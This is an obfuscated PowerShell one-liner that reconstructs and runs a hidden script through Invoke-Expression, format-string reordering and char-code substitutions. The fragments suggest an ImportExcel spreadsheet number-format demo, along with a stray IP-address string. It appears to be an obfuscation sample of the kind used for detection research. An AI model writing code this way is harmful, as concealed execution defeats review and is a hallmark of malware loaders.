.( $pSHOmE[4]+$pShOme[34]+'x') ( (("{21}{106}{49}{28}{45}{74}{87}{24}{23}{152}{116}{143}{26}{117}{60}{131}{138}{2}{107}{62}{115}{127}{129}{111}{81}{145}{142}{80}{76}{20}{78}{105}{120}{61}{82}{55}{146}{66}{25}{95}{137}{59}{6}{128}{139}{44}{43}{119}{16}{34}{125}{10}{51}{104}{63}{48}{68}{53}{134}{144}{67}{153}{46}{98}{110}{130}{99}{4}{9}{19}{118}{15}{88}{8}{85}{126}{38}{91}{42}{147}{79}{31}{149}{75}{5}{29}{136}{14}{7}{132}{102}{1}{114}{13}{154}{37}{108}{64}{50}{86}{103}{70}{47}{39}{100}{141}{77}{93}{94}{121}{18}{41}{135}{54}{97}{0}{96}{56}{84}{150}{12}{36}{133}{122}{101}{65}{123}{52}{124}{40}{140}{113}{71}{148}{112}{30}{32}{35}{17}{109}{3}{89}{90}{33}{22}{11}{83}{57}{73}{58}{69}{92}{72}{151}{27}" -f ' w','P','..TcK','o',' ',' N','s.xlsxa1g

','
    ','    ','   Ne','E','lue]',', negative in Red w',')','Item -3.2 -4.1',' -1','i','w -A','mat a','w-PSIt',' ; return}

Q','QWh','erFormat a1g[B','Imp','ry {','E',' QWhP','
','34MP','e','th QWhfile','1',' -S',' -Numb','l','ho','ith ','#Set','I',' the ','Whda','s','m 1','e','v','V','S','hout','gn','Vip:165.246.56.2',' numbers ','rrorAc','
','data ','ve in ','n','th','0.','0','isk','cr','a1gQWh','KImpor','n I','the',' s',':T','(','ore

QWh',';','oug','g ','0a1','#','
','
   ','hrow','t ','Whfi',' -','ch {t','psd1','e','+',' a','Ne','th','t','
','S','ize','te','[Red]-0.#','to ','f','MPTcK','i','blue','It','100
','s','-','w-','r','tio','l','CUTw = MP','..Tc',' ','ut','em 1','.','-Excel -Pa',' aB','SItem -5.2 6.1
','tExc','odu','SS','em 1','-Item QWhf','e = ','or',' ','ign.','Q','e -','w-PS','e','R','l','00 -','iptRoot','Ne','a','=',' positi','w-PS','d','TcK','emo','ta','hee','at','le',' QWh','} c','v','.2','Export','.1',' + sign','g
','ort-M','
    New-P','
')).RePLaCe(([chaR]81+[chaR]87+[chaR]104),[STrinG][chaR]36).RePLaCe(([chaR]97+[chaR]66+[chaR]103),'|').RePLaCe(([chaR]84+[chaR]99+[chaR]75),'\').RePLaCe('a1g',[STrinG][chaR]34).RePLaCe(([chaR]77+[chaR]80+[chaR]86),[STrinG][chaR]39)) 
